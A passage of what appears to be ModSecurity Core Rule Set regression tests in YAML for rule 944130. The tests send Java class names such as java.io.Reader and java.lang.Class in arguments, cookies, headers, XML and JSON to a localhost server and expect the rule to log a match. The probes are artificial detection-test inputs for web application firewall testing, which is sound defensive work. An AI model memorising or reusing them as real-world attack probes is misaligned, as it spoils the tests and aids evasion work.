"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-237 + desc: "XML element value includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PushbackInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-238 + desc: "Nested XML element value includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.PushbackInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-239 + desc: "Content-Type text/plain includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: 
"ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.PushbackInputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-240 + desc: "Content-Type application/json arg value includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.PushbackInputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-241 + desc: "Content-Type application/json arg name includes keyword java.io.PushbackInputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.PushbackInputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-242 + desc: "Argument test includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + 
Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.Reader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-243 + desc: "Argument name includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.Reader=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-244 + desc: "Cookie test includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.Reader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-245 + desc: "Cookie name includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.Reader=test + method: "POST" + 
version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-246 + desc: "Request header test includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.Reader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-247 + desc: "XML attribute value includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-248 + desc: "XML element value includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.Reader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-249 + desc: "Nested XML element value includes keyword 
java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.Reader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-250 + desc: "Content-Type text/plain includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.Reader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-251 + desc: "Content-Type application/json arg value includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.Reader\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-252 + desc: "Content-Type application/json arg name includes keyword java.io.Reader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity 
CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.Reader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-253 + desc: "Argument test includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.StringReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-254 + desc: "Argument name includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.StringReader=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-255 + desc: "Cookie test includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.StringReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-256 + desc: "Cookie name includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.StringReader=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-257 + desc: "Request header test includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.StringReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-258 + desc: "XML attribute value includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" 
+ Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-259 + desc: "XML element value includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.StringReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-260 + desc: "Nested XML element value includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.StringReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-261 + desc: "Content-Type text/plain includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: 
"test=java.io.StringReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-262 + desc: "Content-Type application/json arg value includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.StringReader\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-263 + desc: "Content-Type application/json arg name includes keyword java.io.StringReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.StringReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-264 + desc: "Argument test includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Class" + output: + log_contains: "id \"944130\"" + - test_title: 
944130-265 + desc: "Argument name includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Class=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-266 + desc: "Cookie test includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.lang.Class + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-267 + desc: "Cookie name includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Class=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-268 + desc: "Request header test includes keyword java.lang.Class" + stages: + - stage: + input: + 
dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Class + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-269 + desc: "XML attribute value includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-270 + desc: "XML element value includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Class" + output: + log_contains: "id \"944130\"" + - test_title: 944130-271 + desc: "Nested XML element value includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Class" + output: + log_contains: "id \"944130\"" + - test_title: 944130-272 + desc: "Content-Type text/plain includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Class" + output: + log_contains: "id \"944130\"" + - test_title: 944130-273 + desc: "Content-Type application/json arg value includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.lang.Class\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-274 + desc: "Content-Type application/json arg name includes keyword java.lang.Class" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: 
"ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.lang.Class\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-275 + desc: "Argument test includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.lang.Integer" + output: + log_contains: "id \"944130\"" + - test_title: 944130-276 + desc: "Argument name includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Integer=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-277 + desc: "Cookie test includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + Cookie: test=java.lang.Integer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-278 + desc: "Cookie name includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.lang.Integer=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-279 + desc: "Request header test includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.lang.Integer + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-280 + desc: "XML attribute value includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: 
"element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-281 + desc: "XML element value includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Integer" + output: + log_contains: "id \"944130\"" + - test_title: 944130-282 + desc: "Nested XML element value includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.lang.Integer" + output: + log_contains: "id \"944130\"" + - test_title: 944130-283 + desc: "Content-Type text/plain includes keyword java.lang.Integer" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: 